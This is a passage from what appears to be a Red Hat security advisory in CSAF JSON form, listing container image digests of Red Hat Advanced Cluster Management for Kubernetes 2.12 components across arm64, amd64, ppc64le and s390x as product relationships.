"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
